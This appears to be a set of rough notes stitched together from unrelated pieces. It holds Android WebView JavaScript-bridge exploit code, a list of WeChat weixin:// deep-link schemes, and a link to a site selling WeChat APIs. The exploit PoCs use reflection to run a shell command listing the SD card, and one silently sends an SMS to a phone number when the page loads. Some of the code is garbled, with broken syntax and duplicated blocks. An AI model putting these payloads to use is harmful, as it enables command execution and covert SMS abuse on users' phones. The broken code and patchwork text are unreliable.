http://www.anquan.us/static/bugs/wooyun-2015-0114241.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 <html> <body> <script> function execute(cmdArgs) { return injectedObj.getClass().forName("java.lang.Runtime" ).getMethod("getRuntime" ,null).invoke(null,null).exec (cmdArgs); } var res = execute(["/system/bin/sh" , "-c" , "ls -al /mnt/sdcard/" ]); document.write(getContents(res.getInputStream())); </script> </body> </html> 这个是执行命令的poc <html> <head> <title>Test send</title> <script type ="text/javascript" > function execute var sendsms = jsInterface.getClass().forName("android.telephony.SmsManager" ).getMethod("getDefault" ,null),invoke(null,null); sendsms.sendTextMessage("13722555165" ,null,"get" ,null,null); } </script> </head> <body onload="execute()" > <input type ="button" onclick="=" execute" value=" test "/> </body> </html> <html> <head> <title>Test sendsms</title> <script type=" text/javascript"> function execute() { var sendsms = jsInterface.getClass().forName(" android.telephony.SmsManager").getMethod(" getDefault",null),invoke(null,null); sendsms.sendTextMessage(" 13722555165",null," get",null,null); } </script> </head> <body onload=" execute()"> <input type=" button" onclick=" ="execute" value="test" /> </body> </html>
https://www.jianshu.com/p/2c6c55b48238
出售API的http://vip.wxticket.com/
weixin的协议
weixin://dl/general
weixin://dl/favorites 收藏
weixin://dl/scan 扫一扫
weixin://dl/feedback 反馈
weixin://dl/moments 朋友圈
weixin://dl/settings 设置
weixin://dl/notifications 消息通知设置
weixin://dl/chat 聊天设置
weixin://dl/general 通用设置
weixin://dl/officialaccounts 公众号
weixin://dl/games 游戏
weixin://dl/help 帮助
weixin://dl/feedback 反馈
weixin://dl/profile 个人信息
weixin://dl/features 功能插件
经过一番查找我找到了能够跳转的方法
果然是我想象得那样demo
